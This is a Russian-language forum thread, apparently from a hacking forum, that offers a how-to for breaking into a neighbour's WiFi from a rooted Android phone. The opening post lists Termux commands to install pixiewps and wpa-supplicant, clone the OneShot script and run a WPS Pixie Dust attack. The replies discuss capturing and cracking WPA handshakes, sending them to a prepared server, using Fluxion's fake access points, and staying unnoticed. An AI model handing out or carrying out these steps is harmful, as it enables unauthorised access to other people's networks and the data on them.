What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

WiFi WiFi соседа за пару минут с телефона

Blackplayer

Light Weight
Депозит
$0
Для данного метода требуется ROOT!!!
1 Качаем Termux с GitHub. (Запускаем его)
2 Обновляем имеющиеся пакеты командами :

pkg update затем pkg upgrade
3 Далее подгружаем нужные пакеты:
pkg install tsu
•pkg install python
•pkg install git
•pkg install root-repo

•pkg install -y wpa-supplicant pixiewpsiw
4 Открываем доступ к внутреннему хранилищу телефона:
•termux-setup-storage
5 Подгружаем с GitHub OneShot:
git clone https://github.com/drygdryg/OneShot
6 Даём права:
chmod +x OneShot/oneshot.py
•tsu

7 Запускаем:
python OneShot/oneshot.py -i wlan0 --iface-down -K
 
Пользовался много раз данным скриптом на ноутбуке с Kali и не раз он меня выручал. Еще из похожих WiFi-autopwner очень хорош.
 
Eleven сказал(а):
Нетбук или ноутбук, wifi адаптер. Пришёл куда надо, поймал хэндшейк, расшифровал
Нажмите, чтобы раскрыть...
Расшифровал за пару часов ) с телефоном удобней , не нужно с собой таскать тяжолый ноутбук. Но к сожалению ещё не придумали как расшифровывать все это дело с телефона. А через кастыли очень долго все это работает
 
Blackplayer сказал(а):
Расшифровал за пару часов ) с телефоном удобней , не нужно с собой таскать тяжолый ноутбук. Но к сожалению ещё не придумали как расшифровывать все это дело с телефона. А через кастыли очень долго все это работает
Нажмите, чтобы раскрыть...
Я не говорю, что твой метод не рабочий или не актуален. Речь идёт о wps. Если он выключен, то описанный тобою метод не сработает. А выключают его большинство. Хэндшейк ты поймаешь всегда, при наличии мозгов и прямых рук. Расшифровка по моей статистике 10/10. Ты раз взял нетбук, ноут и поймал хэндшейк. После, ты просто подключаешся с чего угодно к точке. Не такие они и тяжёлые и по сути это тоже переносное мобильное устройство. Что вообще серьёзного можно делать с телефона? По форумам сёрфить разве что, когда вне дома
 
Blackplayer сказал(а):
Расшифровал за пару часов ) с телефоном удобней , не нужно с собой таскать тяжолый ноутбук. Но к сожалению ещё не придумали как расшифровывать все это дело с телефона. А через кастыли очень долго все это работает
Нажмите, чтобы раскрыть...
Заходите на сервак, заблаговременно подготовленный и шлете на него хендшейк с телефона.
Делов то)
 
Hyihiir сказал(а):
Fluxin будет удобней сразу пасс без всяких хеншейков
Нажмите, чтобы раскрыть...
Fluxion* Для работы данного скрипта нужно два wifi адаптера на сколько я знаю. Не будет удобней, даже по причине необходимых двух wifi адаптеров. Хэндшейк ты ловишь по-тихому без всяких фейковых точок и лишнего палева
 
Top